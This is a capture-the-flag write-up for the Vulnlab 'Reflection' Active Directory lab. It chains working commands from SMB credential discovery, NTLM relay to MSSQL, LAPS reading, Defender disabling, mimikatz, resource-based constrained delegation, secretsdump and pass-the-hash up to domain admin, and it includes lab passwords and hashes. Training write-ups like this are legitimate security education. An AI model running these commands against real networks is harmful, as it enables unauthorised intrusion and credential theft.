mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-25 05:10:23 +00:00
304 lines
11 KiB
Markdown
304 lines
11 KiB
Markdown
# Vulnlab - Reflection
|
|
|
|
# NMAP
|
|
|
|
## DC01.reflection.vl
|
|
|
|
```bash
|
|
PORT STATE SERVICE REASON VERSION
|
|
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
|
|
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-08-13 18:24:44Z)
|
|
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
|
|
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
|
|
445/tcp open microsoft-ds? syn-ack ttl 127
|
|
464/tcp open kpasswd5? syn-ack ttl 127
|
|
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
|
|
636/tcp open tcpwrapped syn-ack ttl 127
|
|
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|
|
|_ssl-date: 2023-08-13T18:26:16+00:00; -1s from scanner time.
|
|
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: reflection.vl0., Site: Default-First-Site-Name)
|
|
3269/tcp open tcpwrapped syn-ack ttl 127
|
|
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|
|
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|
|
|_http-title: Not Found
|
|
|_http-server-header: Microsoft-HTTPAPI/2.0
|
|
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
|
|
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
|
|
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
|
|
49669/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
|
|
49682/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
|
|
62571/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
|
|
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
|
|
```
|
|
|
|
## MS01.reflection.vl
|
|
|
|
```bash
|
|
Host is up, received echo-reply ttl 127 (0.21s latency).
|
|
Scanned at 2023-08-13 21:52:56 PKT for 264s
|
|
Not shown: 65531 filtered tcp ports (no-response)
|
|
PORT STATE SERVICE REASON VERSION
|
|
135/tcp open tcpwrapped syn-ack ttl 127
|
|
445/tcp open tcpwrapped syn-ack ttl 127
|
|
3389/tcp open tcpwrapped syn-ack ttl 127
|
|
|_ssl-date: 2023-08-13T16:57:16+00:00; -2s from scanner time.
|
|
| ssl-cert: Subject: commonName=ms01.reflection.vl
|
|
5985/tcp open tcpwrapped syn-ack ttl 127
|
|
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|
|
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|
|
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|
|
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
|
|
| Issuer: commonName=SSL_Self_Signed_Fallback
|
|
| Public Key type: rsa
|
|
| Public Key bits: 2048
|
|
```
|
|
|
|
## WS01.reflection.vl
|
|
|
|
```bash
|
|
Host is up, received echo-reply ttl 127 (0.22s latency).
|
|
Scanned at 2023-08-13 21:52:56 PKT for 264s
|
|
Not shown: 65532 filtered tcp ports (no-response)
|
|
PORT STATE SERVICE REASON VERSION
|
|
135/tcp open tcpwrapped syn-ack ttl 127
|
|
445/tcp open tcpwrapped syn-ack ttl 127
|
|
3389/tcp open tcpwrapped syn-ack ttl 127
|
|
| ssl-cert: Subject: commonName=ws01.reflection.vl
|
|
```
|
|
|
|
## PORT 445 (SMB)
|
|
|
|
Enumerating the smb shares from the machines, we only get list of shares with null authentication on `MS01`
|
|
|
|
<img src="https://i.imgur.com/8xMhHye.png"/>
|
|
Accessing `staging` share we'll get `staging_db.conf` file having credentials
|
|
|
|
<img src="https://i.imgur.com/YNPGHmu.png"/>
|
|
With `crackmapexec` we can try to authenticate on smb to verify if these are valid credentials
|
|
|
|
```bash
|
|
cme smb hosts.txt -u 'web_staging' -p 'Washroom510'
|
|
```
|
|
|
|
<img src="https://i.imgur.com/rWFuxzH.png"/>
|
|
|
|
We can try authenticating over MSSQL as that service is running on DC01 and MS01
|
|
|
|
```bash
|
|
cme mssql hosts.txt -u 'web_staging' -p 'Washroom510' --local-auth
|
|
```
|
|
|
|
<img src="https://i.imgur.com/DLy7GsO.png"/>
|
|
|
|
We get a vaild login so we can proceed with using `mssqlclient.py` from impacket
|
|
|
|
```bash
|
|
mssqlclient.py web_staging:'Washroom510'@10.10.173.134
|
|
```
|
|
|
|
<img src="https://i.imgur.com/qrWt5us.png"/>
|
|
|
|
Since `xp_cmdshell` was not allowed for this user
|
|
|
|
<img src="https://i.imgur.com/uP6wZrX.png"/>
|
|
|
|
We can try using `xp_dirtree` to coerce the server to our machine in order to retrieve NTLMv2 hash of service account of mssql
|
|
|
|
<img src="https://i.imgur.com/sTvRfHF.png"/>
|
|
|
|
But cracking this hash didn't worked as well
|
|
|
|
<img src="https://i.imgur.com/a9TPMMj.png"/>
|
|
So we can't crack this hash, maybe we can relay as smb signing is disabled
|
|
|
|
<img src="https://i.imgur.com/43PzJLZ.png"/>
|
|
|
|
With `ntlmrelayx.py` we can realy the hash and authenticate
|
|
|
|
<img src="https://i.imgur.com/Yxgpz6y.png"/>
|
|
|
|
It shows that relaying on smb worked, we can also try to relay it on mssql running on DC01 which will allow us to execute queries as `svc_web_staging`
|
|
|
|
```bash
|
|
ntlmrelayx.py -t mssql://10.10.173.133 -smb2support --query 'SELECT @@version'
|
|
```
|
|
|
|
<img src="https://i.imgur.com/9rMODWJ.png"/>
|
|
|
|
We can enumerate the databases, as here's there's one called `prod`
|
|
|
|
```bash
|
|
ntlmrelayx.py -t mssql://10.10.132.133 -smb2support --query 'SELECT name FROM master.dbo.sysdatabases;'
|
|
```
|
|
|
|
<img src="https://i.imgur.com/GeXbWIO.png"/>
|
|
But listing the tables in that database didn't worked as this user doesn't have access , trying to enable xp_cmdshell didn't worked here as well
|
|
|
|
<img src="https://i.imgur.com/itM1R9d.png"/>
|
|
|
|
So there was nothing we could do from here but as saw previously that svc_web_staging was able to authenticate smb we can list shares and try to access shares from DC01, for this we need to use socks proxy as it's going to keep the smb connection open and also lists the relays which were successful
|
|
|
|
<img src="https://i.imgur.com/DfLciSK.png"/>
|
|
|
|
```bash
|
|
ntlmrelayx.py -tf hosts.txt -smb2support -socks
|
|
```
|
|
|
|
<img src="https://i.imgur.com/8q4en3E.png"/>
|
|
|
|
It does show that this user is not an admin but still we can access the smb shares as a domain user with `smbclient`
|
|
|
|
<img src="https://i.imgur.com/HUVWjdF.png"/>
|
|
|
|
To my surprise this didn't worked and I don't know the reason, maybe it's an issue with my version of smbclient but with smbclient.py from impacket worked like a charm
|
|
|
|
|
|
```bash
|
|
proxychains smbclient.py reflection/svc_web_staging@10.10.132.133
|
|
```
|
|
|
|
<img src="https://i.imgur.com/cTN54tF.png"/>
|
|
|
|
From `prod` share we can grab `prod_db.conf`
|
|
|
|
<img src="https://i.imgur.com/g1G966K.png"/>'
|
|
|
|
<img src="https://i.imgur.com/Vqjk7pJ.png"/>
|
|
|
|
Having the credentials for the production, we can enumerate the database
|
|
|
|
```powershell
|
|
mssqlclient.py web_prod:Tribesman201@10.10.132.133
|
|
```
|
|
|
|
<img src="https://i.imgur.com/vPx1fG0.png"/>
|
|
|
|
From the `users` table we'll get set of two credentials
|
|
|
|
<img src="https://i.imgur.com/A8HrHVI.png"/>
|
|
|
|
On verifying these credentials, both of them are domain users
|
|
|
|
<img src="https://i.imgur.com/23Yb5Oi.png"/>
|
|
So now we can enumerate the domain with `bloodhound` , before doing that make sure to edit the hosts file for dc01.reflection.vl entry
|
|
|
|
<img src="https://i.imgur.com/g3Mm48X.png"/>
|
|
|
|
```bash
|
|
python3 /opt/BloodHound.py-Kerberos/bloodhound.py -d 'reflection.vl' -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' -ns 10.10.132.133 -c all
|
|
```
|
|
|
|
<img src="https://i.imgur.com/DzFWVpG.png"/>
|
|
|
|
From bloodhound we see these two users are part of Staff group
|
|
|
|
<img src="https://i.imgur.com/Vm1tLj1.png"/>
|
|
<img src="https://i.imgur.com/AypaT2t.png"/>
|
|
But Staff group didn't had any ACLs, abbie had `GenericAll` on `MS01`
|
|
|
|
<img src="https://i.imgur.com/6xxGOQN.png"/>
|
|
|
|
Unfortunately we can't just add a computer object as there's 0 machine quota
|
|
|
|
<img src="https://i.imgur.com/BqeYivn.png"/>
|
|
|
|
However, since we have GenericAll, we can read LAPS on MS01 which is a randomized password for local administrator
|
|
|
|
```bash
|
|
cme smb 10.10.132.134 -u 'abbie.smith' -p 'CMe1x+nlRaaWEw' --laps
|
|
```
|
|
|
|
<img src="https://i.imgur.com/S7Y8SQi.png"/>
|
|
|
|
```bash
|
|
evil-winrm -i 10.10.132.134 -u 'administrator' -p 'H447.++h6g5}xi'
|
|
```
|
|
|
|
<img src="https://i.imgur.com/ZyWKUjF.png"/>
|
|
|
|
Disabling the defender with `Set-MpPreference -DisableRealtimeMonitoring $true`
|
|
|
|
<img src="https://i.imgur.com/1UmVb5L.png"/>
|
|
|
|
Uploading netcat and getting a shell again as evil-winrm was causing an issue with mimikatz
|
|
|
|
<img src="https://i.imgur.com/6YVPhIz.png"/>
|
|
|
|
From the cache, we see `Georgia.Price`
|
|
|
|
<img src="https://i.imgur.com/1dHedue.png"/>
|
|
|
|
With `vault::cred /patch` we can list the credentials from the credential vault
|
|
|
|
<img src="https://i.imgur.com/6UwkZM1.png"/>
|
|
|
|
Going back to bloodhound, this user also has `GenericAll` on `WS01`
|
|
|
|
<img src="https://i.imgur.com/xifwMRO.png"/>
|
|
|
|
We know that there's no machine quota available but we do have access to MS01, we can add that machine in WS01's `msDS-AllowedToActOnBehalfOfOtherIdentity` property, for this we need to get the NThash of MS01
|
|
|
|
<img src="https://i.imgur.com/9OjTlkp.png"/>
|
|
Editing the `msDS-AllowedToActOnBehalfOfOtherIdentity` with `rbcd.py` from impacket
|
|
|
|
```bash
|
|
rbcd.py -action write -delegate-to "WS01$" -delegate-from "MS01$" -dc-ip 10.10.188.197 "Reflection/Georgia.Price:DBl+5MPkpJg5id"
|
|
```
|
|
|
|
<img src="https://i.imgur.com/nyQJnGE.png"/>
|
|
|
|
After adding the property, we can impersonate the administrator ticket on WS01 with `getST.py`
|
|
|
|
```bash
|
|
getST.py -spn 'cifs/WS01.reflection.vl' -impersonate Administrator -dc-ip 10.10.188.197 'Reflection/MS01$' -hashes ':6e77d4ac157a47c5581681b8f865677e'
|
|
```
|
|
|
|
<img src="https://i.imgur.com/0yqjKCA.png"/>
|
|
|
|
<img src="https://i.imgur.com/kaZrA7Q.png"/>
|
|
|
|
And now we can dump hashes from WS01
|
|
|
|
```bash
|
|
secretsdump.py administrator@WS01.reflection.vl -k -no-pass
|
|
```
|
|
|
|
<img src="https://i.imgur.com/ilagr5H.png"/>
|
|
Since defender was enable on WS01 we couldn't get a shell through psexec.py
|
|
|
|
<img src="https://i.imgur.com/9AE3MTs.png"/>
|
|
|
|
We can however use `atexec.py` to schedule the commands to be executed in order disable defender
|
|
|
|
<img src="https://i.imgur.com/s34Eutm.png"/>
|
|
|
|
```bash
|
|
atexec.py ws01/administrator@10.10.188.199 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"' -hashes ':a29542cb2707bf6d6c1d2c9311b0ff02'
|
|
```
|
|
|
|
<img src="https://i.imgur.com/eqeH3Op.png"/>
|
|
After this, we'll be able to use psexec to get a shell
|
|
|
|
```bash
|
|
psexec.py administrator@WS01.reflection.vl -hashes ':a29542cb2707bf6d6c1d2c9311b0ff02'
|
|
```
|
|
|
|
<img src="https://i.imgur.com/dM52Led.png"/>
|
|
|
|
As we already dumped hashes, we have Rhys.Garner's password who is a local admin on WS01, this user didn't had any ACLs on any object, checking the domain admins, there are 2 domain admins
|
|
|
|
<img src="https://i.imgur.com/glE9M4b.png"/>
|
|
|
|
We can try spraying the password on them to see if we can get access to those users
|
|
|
|
<img src="https://i.imgur.com/szM2Mt9.png"/>
|
|
|
|
Which worked on `DOM_RGARNER`, with this we can login on DC01 through winrm and become domain admin
|
|
|
|
<img src="https://i.imgur.com/mo2lYZR.png"/>
|
|
|
|
# References
|
|
|
|
- https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/
|
|
- https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd
|
|
- https://tools.thehacker.recipes/impacket/examples/atexec.py
|